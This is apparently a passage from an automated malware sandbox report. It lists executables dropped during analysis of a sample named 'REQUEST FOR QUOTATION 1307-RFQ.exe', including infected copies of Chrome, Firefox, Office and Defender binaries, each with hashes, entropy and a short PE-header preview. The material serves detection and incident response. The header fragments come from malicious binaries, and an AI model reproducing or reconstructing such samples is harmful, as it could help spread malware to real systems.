Encrypted:	false
SSDEEP:	196608:3hRrmpGpGdJM7Hbp8JfrCGvqTYuNDmoefAlprtPz25HqaI6HMaJTtGbQOi8m9:3hRCpGpMJMrbp8JjpWdNlc5gC
MD5:	02E82CABD2B3C40DEC3C902B1687CF2F
SHA1:	576FC475B52DAD4816E1B6931FA37DF41833B7C6
SHA-256:	EE38EFE363ECC0E028377E2B74951F48E7B2B4666F29DC6904B834FE22CF5568
SHA-512:	2DFA63711C63839F007EA35ABF1C6B6FB0F91CFC25903EE0204F54965BBC725B273DA142325E5F9DB2EF8833B13264432D06615E5A94BE17D430D42F57F1ECDC
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...................................H...........!..L.!This program cannot be run in DOS mode....$.......$.\|+`{.x`{.x`{.xi..xv{.x...yf{.x...yj{.x...yd{.x...yO{.xG..xh{.xG.oxa{.x...yb{.x...ya{.x...ya{.x...yd{.x...yc{.x...y~{.x...y}{.x`{.xTs.x...ya{.x...yjz.x...y v.x...xa{.x`{.xa{.x...ya{.xRich`{.x........PE..d......e..........".... .....H.................@......................................... ..................................................u..D.... ?...X...7.........................8....................U..(...`...@............0.. "..l .......................text............................... ..`.rdata..S.~..0....~.................@..@.data.........1.......0.............@....pdata........7.......7.............@..@.didat..`.....>.......>.............@....detourc.!....>.."....>.............@..@.rsrc.....X.. ?...X...>.............@..@.reloc..............................@...........................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\appvcleaner.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2199552
Entropy (8bit):	6.782797070095846
Encrypted:	false
SSDEEP:	49152:f83pZ3kd0CuEeN0LUmRXbYs65mKJLeQVPyzc+E7xQ2l:nKuUMY15N1vcbE7xQ2l
MD5:	77CA222E531FB560A1868E3EE4D38482
SHA1:	0A963D52F9B43C88DEA1B6A99C29DEBE6B531870
SHA-256:	29C4BB79EED106BC2D7A53DAC81FDFDDBB03365951223C8C98EBB4F539577CF6
SHA-512:	6D5B4B608D9B224955780B5EFA9ECD0F0E709BF1296B2125A6268465EFC1C8F08D003243D6F68AD82B98640E138CD39D3CD9C9C653A8CA3F188E55A70006EB2E
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......D................7......................!..............~............Y.......[............Rich............PE..d...rq............"..................$.........@..............................!.......!... .......... ......................................P...\|....p... ......L....................a..T...................Xt..(... s..8............t...............................text...6........................... ..`.rdata..............................@..@.data...@...........................@....pdata..L...........................@..@.rsrc.... ...p...0...P..............@..@.reloc... ..........................@...................................................................................................................................................................................................................................................................

C:\Program Files\Common Files\microsoft shared\ClickToRun\officesvcmgr.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4971008
Entropy (8bit):	6.668611104953452
Encrypted:	false
SSDEEP:	49152:RErw1zDb1mZtOoGpDYdSTtWXy4eqH8nYAmoBvYQugWupoI6bAGO8ndOPcptz6+My:3A4oGlcR+glpdOPKzgVZc1vcbE7xQ2l
MD5:	CCDFF708DC0629D337FD7B943067AED1
SHA1:	33F26CFCAA023214952C008B6D68EAB74649F95D
SHA-256:	993E4E7318492CB96466E158DE3859BF445AB6825A038C46945D4EA6C4977127
SHA-512:	C1234B33C33D7006AFCCEF46017C19C2BA782A94FD505E8AED1F08F56446F51A033A257A339E054140E4769ED8687EA2C628A5E64D7AB82EB20FC5846C196E59
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......Eh.<..{o..{o..{o.q.o..{oaszn..{oas~n*.{oas.n..{oasxn..{o.{}n..{o.{xn..{o.{.n..{o.{zn..{o..zo..{odsxn..{ods~n..{odsrnF.{ods.o..{o...o..{odsyn..{oRich..{o........PE..d...0m.d..........".... ..-.........0p+........@..............................L......L... .................................................HZ:.......B.......@.<C....................:.8...................p.9.(... P..@.............-......H:.@....................text...[.-.......-................. ..`.rdata..9.....-.......-.............@..@.data...x....`>......>>.............@....pdata..<C....@..D....@.............@..@.didat..`.....B......LB.............@....rsrc.........B......PB.............@..@.reloc........B......ZB.............@...........................................................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\chrmstp.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.8274355423687485
Encrypted:	false
SSDEEP:	98304:gv2gM+qwtLg7pPgw/DSZHa1vcbE7xQ2l:g+BRwpgKxa8m9
MD5:	18BC9EB1048283A1DDE7CD5930400B95
SHA1:	FF7CA432DC8425E83273E202561771057756347E
SHA-256:	D5F831925FCACC7E6295CC1727FB4950BA6E859382E74AFD199CA2B92F6D51A8
SHA-512:	AF3A2F87D4C6366537BB01E46CA008F158EF8B7ABB791A735B0BDF5EB558C49740ED870FC85E5617DCFB31CB84B6B77ACA42CC3C430567F5EE6BA51017B3B90B
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L.....D.K... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\Installer\setup.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	4897792
Entropy (8bit):	6.827442215140447
Encrypted:	false
SSDEEP:	98304:mv2gM+qwtLg7pPgw/DSZHa1vcbE7xQ2l:m+BRwpgKxa8m9
MD5:	43C0D894AC73C2037D01BEF372216ECE
SHA1:	1D54BF8B83160B56C29B22AEB80DA76E64BD6449
SHA-256:	779BC561A9C06F89401154F7A252D6A144EE96C2754F9E1C88097FEBC22BA29F
SHA-512:	55FAD6487937C377241D4E2D61D4682C4F861522109A0E9D881A30423929EC67A11BAF18FF02DFFC4C7FE961554B95C32578CC33E3FDCE0A7831827D64EC2DC6
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......D/......... ..........@..............................L.....kFK... ...........................................6.N.....6.......<......P:.l.....................6......................6.(...`s/.@.............6.8.....6.@....................text....C/......D/................. ..`.rdata......`/......H/.............@..@.data...4:....8.......7.............@....pdata..l....P:.......9.............@..@.00cfg..0.....;.......:.............@..@.gxfg....1....;..2....:.............@..@.retplne.....0<.......:..................tls....A....@<.......:.............@...CPADinfo8....P<.......:.............@...LZMADEC......`<.......:............. ..`_RDATA..\.....<.......:.............@..@malloc_h......<.......:............. ..`.rsrc.........<.......:.............@..@.reloc... ...`C.......A.............@...........................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\chrome_pwa_launcher.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2156544
Entropy (8bit):	6.947901059017023
Encrypted:	false
SSDEEP:	24576:DtjqL8fHv8aUbp8D/8+xyWAyGJ0eeQ2yPyzc+E7xonyVGc/dT5N:5jKKv81FI/8zXJLeQVPyzc+E7xQ2l
MD5:	2D6BADCF1C6C93EAC29AC58279E663C6
SHA1:	09DDE9908FD39AFE326492A36382E4421094C90F
SHA-256:	0788C326FB1A295897D6167DBDA16CAE70CF1D93BB4A8542B869E1F542CAE280
SHA-512:	C9E25756F593F67D3DE172ED934002C1481895FF59A5F00B879DCD83F0ECC4A78A01B8EBFD7A881A010C4F218A2AABF7F5EC1D6668A0618F7F2A474B8BDD9999
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......F.....................@.............................P"......D!... ..........................................X..\...$Y....... ...&......(...................lM......................PL..(...pr..@............_...............................text....D.......F.................. ..`.rdata..$....`.......J..............@..@.data...,.... ......................@....pdata..(...........................@..@.00cfg..0...........................@..@.gxfg....,..........................@..@.retplne.................................tls................................@...LZMADEC............................. ..`_RDATA..\...........................@..@malloc_h............................ ..`.rsrc....&... ...(..................@..@.reloc.......P......................@...................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\elevation_service.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	2370560
Entropy (8bit):	7.027052516959069
Encrypted:	false
SSDEEP:	49152:xAMsOu3JfCIGcZuTodRFYKBrFDbWplJLeQVPyzc+E7xQ2l:xAMa3PZuTSc1vcbE7xQ2l
MD5:	65BC4C91EA79BC844AB873E127D7255A
SHA1:	CC05F46059D731270A4E42446D14855D2E03738F
SHA-256:	4CF9E1D8CAFF23500516D22E8F3731A7826CE62BED66166051E0D9550A100458
SHA-512:	6DE77A17C621E4AC16825FA464C9A321D3798C813ACEA08C918557E997781248B4C9614063DABB2307F6F0033E3EEA6813B5A46D2059779CDD6447D0AC80B135
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e..........".................0..........@..............................%.....r.%... ..........................................}..Z...Z}...............@..`...................$k.......................j..(.......@............... ............................text...V........................... ..`.rdata..Hv.......x..................@..@.data...t....`.......>..............@....pdata..`....@.......6..............@..@.00cfg..0...........................@..@.gxfg....+.......,..................@..@.retplne.....@...........................tls....A....P......................@..._RDATA..\....`....... ..............@..@malloc_h.....p.......".............. ..`.rsrc................$..............@..@.reloc...............<..............@...........................................................................................................................................

C:\Program Files\Google\Chrome\Application\117.0.5938.132\notification_helper.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1984512
Entropy (8bit):	7.097974720785373
Encrypted:	false
SSDEEP:	49152:CSK7Fhsly2EPfOGEIJLeQVPyzc+E7xQ2l:XU2cOI1vcbE7xQ2l
MD5:	6CEB2C4671B2A326AB1A74FF68044BF9
SHA1:	36291904692965E246858EB62FC5A7390B643C98
SHA-256:	FF264742F8CACE4684F3F5150348A6EF71972B5D8854B16F90197BB2BC411D0F
SHA-512:	FAEC1DE240ACD38DE51CFAA5A519F964B2367EC796B5D806935C3FEE575CACF1E0BD002B53258F2004A6562DDE2247EB711B755F3B5E2E476E9F7A61F81A0AF7
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."............................@.......................................... ............................................\...$................p..t...............................................(...P...@...........x...x............................text............................... ..`.rdata..............................@..@.data................z..............@....pdata..t....p.......x..............@..@.00cfg..0...........................@..@.gxfg...@-... ......................@..@.retplne.....P.......D...................tls.........`.......F..............@...CPADinfo8....p.......H..............@..._RDATA..\............J..............@..@malloc_h.............L.............. ..`.rsrc................N..............@..@.reloc...............X..............@...................................................................................................

C:\Program Files\Google\Chrome\Application\chrome_proxy.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1779712
Entropy (8bit):	7.15108358090093
Encrypted:	false
SSDEEP:	49152:Zv7e0j11mD+/wDGb+JLeQVPyzc+E7xQ2l:9Dx1mk+1vcbE7xQ2l
MD5:	FCC13EF71CEA6BC960710DB283E59EE6
SHA1:	9C7EB69890429B67B2E75E307DA2EF1C26063F69
SHA-256:	75E2DCE70C00EBD98028261C0DA0B1CD62101623F3C8889B5D531A15CE4CB3B0
SHA-512:	4F961C48F4BE79FD38B970B6B43A10562B00F910918528F24EA2285938D7A758467478DF09D857F45742D842372E445BCF68A4AF7A5A27012FD360BF7EFF809D
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."..........B.................@.....................................d.... .........................................X...U...............x....p.................................................(...`2..@...............X............................text............................... ..`.rdata..,w... ...x..................@..@.data...............................@....pdata......p.......x..............@..@.00cfg..0...........................@..@.gxfg....).........................@..@.retplne.....@.......&...................tls.........P.......(..............@..._RDATA..\....`.....................@..@malloc_h.....p.......,.............. ..`.rsrc...x...........................@..@.reloc...............8..............@...........................................................................................................................................

C:\Program Files\Mozilla Firefox\crashreporter.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1484800
Entropy (8bit):	5.064029755404418
Encrypted:	false
SSDEEP:	24576:WKhSrGJ0eeQ2yPyzc+E7xonyVGc/dT5N:W8JLeQVPyzc+E7xQ2l
MD5:	7C47D0273AF9846033980BCA9D08D995
SHA1:	F1AE9F2EB3B06A0D66A8BB3A999EC9F48ED17FF9
SHA-256:	80C5BF3C76FEE832FFE037879C902EC9313BFAF130FE0093C06F7AAD5CA4A53D
SHA-512:	76CDD461522C0F4E37908CB17E7FC1C6217CB19F0EA99E6E3FA5F8354EBE550C04FA3865175D98EA395FBD6F9272FAEC26800FBC4BCE606C38461CE8ABA1C008
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."............................@..............................!.....R..... ..................................................................P......................T...........................(...p...8...........H................................text............................... ..`.rdata...h.......j..................@..@.data........@......................@....pdata.......P.......0..............@..@.00cfg..(....`.......@..............@..@.tls.........p.......B..............@....voltbl..............D...................rsrc................F..............@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\default-browser-agent.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1286656
Entropy (8bit):	7.214633333888657
Encrypted:	false
SSDEEP:	24576:4sFfc1VyFnTUQn652bO4HGGJ0eeQ2yPyzc+E7xonyVGc/dT5N:4sFcInTrJDJLeQVPyzc+E7xQ2l
MD5:	8F2D077017D9CA7203318CEBD4A0F464
SHA1:	1E61F08A40E1421AEAEF593284E9AD4450D833C5
SHA-256:	057DFEF2E0DE08822F7E513C41666C28052794EF24F8F1B2AD4BB508B6BFD923
SHA-512:	803D72F9A66B86BCAC6CA41F5071A85272341347D1D9001375E457C1AADD3CB3407A4AA159117E955E1C0C649200B3DCD485B6A1FD5798AE4F47ACCC7B0AB2AF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......6..........pX.........@....................................mC.... ..........................................J.......K..........`........%..................DA..........................(...`...8............V...............................text...V5.......6.................. ..`.rdata...O...P...P...:..............@..@.data...............................@....pdata...%.......&..................@..@.00cfg..(...........................@..@.tls................................@....voltbl..................................rsrc...`...........................@..@.reloc....... ......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\firefox.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1246208
Entropy (8bit):	7.486118538012391
Encrypted:	false
SSDEEP:	24576:ft9j6p4xQbiKI69wpemIwpel9nGJ0eeQ2yPyzc+E7xonyVGc/dT5N:ft9+aQbtl2peapelwJLeQVPyzc+E7xQW
MD5:	FF41DFD0AF994C778FFC1CD4F68C9B3C
SHA1:	3D8C67214CE456B3F938F6260DC37F5E32244E46
SHA-256:	463557A5074BE727F58D59C0D348B80FE2479C7B308241632C19ED569B080AA6
SHA-512:	A2302359E275DADBF33B7CAEF054712F45C99BE14F2A39EF2571C33A6E25AD5782BF822A9856C57BF6B27645CE960AC674CFA2EE8A35CC33526C5FF30E4125A9
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......$.....................@....................................M..... .................................................g...h............P..t%..................4........................k..(....@..8...........P...........@....................text....".......$.................. ..`.rdata.......@.......(..............@..@.data...p+... ......................@....pdata..t%...P...&..................@..@.00cfg..(............2..............@..@.freestd.............4..............@..@.retplne$............6...................tls.................8..............@....voltbl..............:...................rsrc................<..............@..@.reloc...............$..............@...................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\maintenanceservice.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1463296
Entropy (8bit):	5.030513620468314
Encrypted:	false
SSDEEP:	24576:GQVTZu0J+GJ0eeQ2yPyzc+E7xonyVGc/dT5N:NVTZuAJLeQVPyzc+E7xQ2l
MD5:	80A15CCF6E8344146DED48870C1C1B51
SHA1:	34ABF0DEACACF45D79DBE4F3714EF73DDB3422F1
SHA-256:	14080881B1B8963E294A8F405ABD1AEEACD148493BDAAC61517280F6405D002E
SHA-512:	DB8B472DB405A2E7AB2F6DFD3F84EE3CC52A6E86918DE3AF4EBC32412F9387FC5077A0B348502F0F8B9B55E1839F17B4E3452B024A70A327632B35E2409545F7
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......R...$.................@.............................. ........... .................................................h&..................`....................$..........................(....p..8............,...............................text...FQ.......R.................. ..`.rdata.......p.......V..............@..@.data...4#...`.......<..............@....pdata..`............J..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl.*............h.................._RDATA...............j..............@..@.rsrc................l..............@..@.reloc...............t..............@...........................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\minidump-analyzer.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1344000
Entropy (8bit):	6.800599645761557
Encrypted:	false
SSDEEP:	24576:+C1vpgXcZ/zMGJ0eeQ2yPyzc+E7xonyVGc/dT5N:+C1vpIc9TJLeQVPyzc+E7xQ2l
MD5:	F974EF386BFD4FA69085CF5CE590C086
SHA1:	DDDA0545052B4EB748869610B5FE890779D7D4A5
SHA-256:	82754544C59B4F99D449F8AE71BD5FBAF492774A15389473755A5C7872BC59D7
SHA-512:	4A0C7A6199FCC3D26914FAC9C9F7918FD6760FC7BC492CF545A17CFD84E469FFE25C328F575498F1792EE7DCD1854DC4F4540994695EDCF4B53ABD9BD0AB1BBF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......T...H......0..........@.......................................... .........................................................................................T........................r..(....p..8...............`............................text...fS.......T.................. ..`.rdata.......p.......X..............@..@.data....2...@...,..."..............@....pdata...............N..............@..@.00cfg..(............d..............@..@.tls.................f..............@....voltbl..............h...................rsrc................j..............@..@.reloc... ...........r..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\pingsender.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1306624
Entropy (8bit):	4.794340261233765
Encrypted:	false
SSDEEP:	12288:wNwj4GJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:wS4GJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	5725FD813D4A6C77E6F92806219A08E7
SHA1:	8A7C0CD6EEC577BD9741808F84231C287B3AE396
SHA-256:	462E3C7F265872048518DD94AB260B4D09B1A0E3E1C766BDDB630D93286EDF9D
SHA-512:	43C2706B9A8F219E8BB7A23C153C1FEBF0712FB747EC6ED74450A556019D1364B945AEA134BD810D625B6E90F2E8ADEF6507987FA934275AB95E9F7D31F85419
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."..........b......`..........@.............................P............ ..........................................................`....... .. ...................t...........................(.......8............................................text............................... ..`.rdata..dM.......N..................@..@.data...............................@....pdata.. .... ......................@..@.00cfg..(....0......................@..@.tls.........@......................@....voltbl......P...........................rsrc........`......................@..@.reloc.......p......................@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\plugin-container.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1515008
Entropy (8bit):	5.131822353829867
Encrypted:	false
SSDEEP:	24576:4WDntIfGpOGJ0eeQ2yPyzc+E7xonyVGc/dT5N:zZIeLJLeQVPyzc+E7xQ2l
MD5:	B90B4ED45B0D52E6BEC8F6345F38EA76
SHA1:	ED68BB3E625477A5FC15A286D0B02D226B226610
SHA-256:	591838CE5203E748F6216486A128250E6235E8D13E3ADF6C65BBBB17517C67C1
SHA-512:	C04684EA74DE3A2C881925C8127F5531733C8E666BA27F7C151D504BF6587C520F1E69C7EA54FBEC3266A6F042EC194F450DC6B90DB418D55FC647AD1CB473CF
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......~.....................@..............................!........... .....................................................@.......P....P.................................................(... ...8...................8........................text...w}.......~.................. ..`.rdata..,...........................@..@.data...0%... ......................@....pdata.......P......................@..@.00cfg..(....p.......*..............@..@.tls.................,..............@....voltbl..................................rsrc...P............0..............@..@.reloc...............>..............@...................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\private_browsing.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1291776
Entropy (8bit):	4.755479335902617
Encrypted:	false
SSDEEP:	12288:HIh0GJ0T3yeQ28W2xzLy+yjupYvLJc+qX7xOTxzzy8gGcGwSMTWpwN:m0GJ0eeQ2yPyzc+E7xonyVGc/dT5N
MD5:	983CA2231DB80CCBE02159BC2D216788
SHA1:	34BBABB95BBE292E618FCAD2B89DFE76A563E40A
SHA-256:	B4FF9B9D207D234C9B2DEA99D5C62552FB0065EF45EE000FFD49DBD2ED4F60C2
SHA-512:	1700EA0456F1AC01D176A1A27EC2E6628C54E97F957B2F2558D3EF15A5B1D1361900008EC053F981CCAF30D50016ED160E0912B2CB6C96945532FE81A5191FB5
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e..........".................p..........@.......................................... ..................................................6...............`..4....................5..............................`0..8............:..H............................text............................... ..`.rdata.......0......."..............@..@.data........P.......8..............@....pdata..4....`.......:..............@..@.00cfg..(....p.......>..............@..@.voltbl..............@...................rsrc................B..............@..@.reloc.......0......................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files\Mozilla Firefox\updater.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1638400
Entropy (8bit):	5.13558109396103
Encrypted:	false
SSDEEP:	24576:e8oRswt2ioQ3J+R3GJ0eeQ2yPyzc+E7xonyVGc/dT5N:e8oRxoF2JLeQVPyzc+E7xQ2l
MD5:	66F56B95AA9DCB805BDA06AF4383FFF0
SHA1:	0AB5636DFCC5BFDACC3814B067A428F02C83CE36
SHA-256:	950E7969F42EC52935A9CD6FDA265B69F38E884D8EACD22AA6EEF5B948F90D0E
SHA-512:	7C17B0B14E99199938AD412E763401713E06DF1EE34598A716261FC44044C22B9F4DB0F080179ED7CD220C77E21338AF5990D59DEB46E84BB284423477DDF63B
Malicious:	true
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d......e.........."......N...........B.........@..............................#........... ..................................................;.......0..X~....... ...................6..........................(....`..8...........0B..H...H9..`....................text....L.......N.................. ..`.rdata.......`.......R..............@..@.data....>...........h..............@....pdata... ......."...v..............@..@.00cfg..(...........................@..@.tls................................@....voltbl.<..............................._RDATA....... ......................@..@.rsrc...X~...0......................@..@.reloc............... ..............@...........................................................................................................................................................................................................................

C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1448448
Entropy (8bit):	4.922742900407421
Encrypted:	false
SSDEEP:	24576:df8HQlTMxHwJ07w3GJ0eeQ2yPyzc+E7xonyVGc/dT5N:dkHQlawJ0RJLeQVPyzc+E7xQ2l
MD5:	6D3DEC020033061C128F1BCABED269A9
SHA1:	C90C2A8DE57558614B9395C55F1A8A73BE291AFB
SHA-256:	A66B20187E41739E4B7309AD63472EB9721D3375DE86A1A716B72F35C6768FDF
SHA-512:	47EDD382E4F779A38D719D41786660F92BDE93E51A1A10320123052F3A983C290721E1E4EBD1018DD57D01DC529FA40A3331BCB3F8D9A9BD5830D3DEDD9F7932
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........x..............a.......r.......r...............r.......r.......r.......ry......r{......r......Rich....................PE..d...B{.?.........."............................@.............................` .....O..... .......... ......................................8b..........................................T.......................(...................@...(...pa..`....................text............................... ..`.rdata..............................@..@.data....&...........z..............@....pdata........... ..................@..@.didat.. ...........................@....rsrc...............................@..@.reloc...............:..............@...................................................................................................................................................................................................................

C:\Program Files\Windows Media Player\wmpnetwk.exe

Process:	C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
File Type:	PE32+ executable (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1534464
Entropy (8bit):	7.117246925140697
Encrypted:	false
SSDEEP:	24576:oSEmYD6gjGPG45QVDkfX4lyTyeGJ0eeQ2yPyzc+E7xonyVGc/dT5N:o5mYD6g2GWQVQfeyT6JLeQVPyzc+E7xX
MD5:	B31F0E8F5DDB2787DDF942CA4B81A683
SHA1:	05537695C6BBF8ADA2D93B887D5FD0C563BC6751
SHA-256:	3472CF401D9FFC1914D0CFFA3A46B6C06C795D1842DACA5724C8820095481724
SHA-512:	618EC28F2E9C287433679E30D44514AE932E154C9B0CFCFD448EBD266090921A3EDCE02994D27B4BA0DACE0E6311DF982238FF0079AFF4ADE430AD7C2CCC4B4B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......."x..f..Ef..Ef..EoaKEd..Err.De..Err.DB..Err.Dh..Err.D}..Ef..E...Err.D]..Err'Eg..Err.Dg..ERichf..E........................PE..d..."..m.........."..........4......@:.........@.......................................... .......... ..........................................,............`...N.................. ...T...........................p...................X...h...@....................text.............................. ..`.rdata...\.......^..................@..@.data....Y.......8..................@....pdata...N...`...P..................@..@.didat...............l..............@....rsrc................n..............@..@.reloc..............................@...................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\autB16B.tmp

Process:	C:\Users\user\Desktop\REQUEST FOR QUOTATION 1307-RFQ.exe
File Type:	data
Category:	dropped
Size (bytes):	65150
Entropy (8bit):	7.912587280810623
Encrypted:	false
SSDEEP:	1536:q528cpUrnN+5sgs/My793OPth/6HCCzdUYQAiCkQ77k:ctcUrc1skc9eVApUYrRw
MD5:	BF264AFD2ACCFB606C3DB1D6B38D3EE9
SHA1:	A17D840046D3972A04B18B31360648710E4FEDBA
SHA-256:	B537F7A79EC38C005ED86E177FFC55364B34200C1E75BAEC4C5A9402457C3DB9
SHA-512:	42BC231E4F74730A94BCC02CF70D456ED869C040C4FBF66A422DF67B4F16C77605592977A6EE480B072F9827C84BF60BF61012367A19411A82FBBBA7AEDC445B
Malicious:	false
Reputation:	unknown
